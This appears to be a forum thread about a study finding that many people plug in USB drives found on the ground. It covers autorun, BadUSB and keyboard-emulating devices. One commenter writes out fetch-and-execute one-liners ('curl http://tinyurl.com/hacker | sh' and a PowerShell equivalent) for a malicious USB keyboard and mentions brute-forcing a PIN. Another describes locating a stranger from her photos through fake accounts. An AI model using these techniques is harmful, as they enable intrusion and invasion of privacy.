A Lot of People Carelessly Plug In Random USB Drives Into Their Computers

An anonymous reader writes: Scientists have proven that a lot of people will carelessly plug in a USB drive found on the ground, exposing themselves to potential infections from malware. The researchers dropped 297 USB flash drives on a university campus and saw that in 48% of the cases, people picked them up, plugged them in, and opened files from the drive on their computers. Should such people be mocked? Would you plug in a USB drive that you found on the ground? Bruce Schneier, an American cryptographer, computer security and privacy specialist makes a good point: People get USB sticks all the time. The problem isn't that people are idiots, that they should know that a USB stick found on the street is automatically bad and a USB stick given away at a trade show is automatically good. The problem is that the OS trusts random USB sticks. The problem is that the OS will automatically run a program that can install malware from a USB stick. The problem is that it isn't safe to plug a USB stick into a computer.

Turn off autorun

[cmiller173]

I turned off autorun on any external media a long time ago, back when sony cd's were injecting rootkits under the guise of DRM circa 2005. Nothing on insertable media autoruns on my PC.

Re:The chance of getting juicy selfies are a lot h

[sexconker]

Yeah right.

I'm not most people, but I did exactly this (with an SD card).

I went through photos on the card, managed to fine one that included a USPS package, transformed the image to read a partial name and was able to scan the barcode to get a zip, looked at other photos and compared them to Google/Bing maps and found the street but not the address, then found several profiles on the web, ultimately matching one photo to a Facebook account using a cropped version as the profile photo.

I then created a throwaway email account to create a throwaway Facebook account under the name of Natalie FoundUrSDCard or some such, messaged her and posted the uncropped version of her profile photo, and waited.

She responded and sent her uncle to come pick it up.

He did.

Re:What kind of dumb OS...

It doesn't even have to involve autorun: https://www.blackhat.com/us-14/briefings.html#badusb-on-accessories-that-turn-evil

Once reprogrammed, benign devices can turn malicious in many ways, including:

        A device can emulate a keyboard and issue commands on behalf of the logged-in user, for example to exfiltrate files or install malware. Such malware, in turn, can infect the controller chips of other USB devices connected to the computer.
        The device can also spoof a network card and change the computer’s DNS setting to redirect traffic.
        A modified thumb drive or external hard disk can – when it detects that the computer is starting up – boot a small virus, which infects the computer’s operating system prior to boot.

Re:People are stupid

[Dutch+Gun]

It might be a pretty effective way to go spearphishing though. If you're trying to get into a specific high-value network, then this might be a great way to do it. Drop it outside the target office, label it something like "Private photos - do not view!" or something like that, and watch human nature take over.

Hopefully the administrator has properly hardened workstations against executing code on a random USB, but I'd bet a surprising number of networks would get infected in fairly short order.

Re:USB keyboard. Your computer DOES run the comman

[Tablizer]

Being nasty, it tells the computer that it's a keyboard...

OS should prompt to verify. "A new peripheral has been detected. It claims to be a keyboard. Is this correct?"

True, if you don't have a keyboard (and no mouse yet) you cannot tell the computer if you approve or disapprove.

A partial solution would be to display a message and give the user 90 seconds to respond.

"A new device that claims to be a keyboard has been detected (plugged in). If you don't reply within 90 seconds, the keyboard will be accepted."

Re:USB keyboard. Your computer DOES run the comman

[phantomfive]

Another solution: if a keyboard is already plugged in, prompt for a warning. If a keyboard is not plugged in, accept it.

Basically how I did it (first for screen saver loc

[raymorris]

That's basically what I did; I used the same chip used by the Arduino Nano, flashed with the Arduino bootloader, without the Arduino circuit board.

At first, I put it together to brute-force an Android PIN overnight. Then I adjusted the code slightly to keep a Chromebox from going into power saving mode, because the Chromebox was running a wall-mounted display.

Having a tiny USB device that acts as a keyboard and nothing more to do with it, mounting it in an old flash drive casing was the next logical step for a security geek like myself.

It downloads and runs a program

[raymorris]

There are a few characters missing from the code I posted. I don't have a Windows machine handy to test with at the moment, in order to catch any errors. It would actually be more like:

Win+R powershell -command 'Invoke-WebRequest http...

Invoke-WebRequest downloads a URL, like a browser would, but then we use the pipe character | to send the content of that URL to powershell. Powershell is kind of like cmd.exe, but more powerful. If you do Win+R cmd.exe you'll see what looks like a DOS prompt, where you can type commands. Powershell is that on steroids (and on crack).

Piping them together, you get "retrieve commands from http://tinyurl.com/jfjdhd and run them using powershell ".

The Linux/Unix/Mac version is similar:

curl http://tinyurl.com/hacker | sh

Curl gets whatever is at that URL and sends it to "sh". Sh, the shell, is the "DOS prompt" of Unix, and runs whatever commands that curl got from the internet.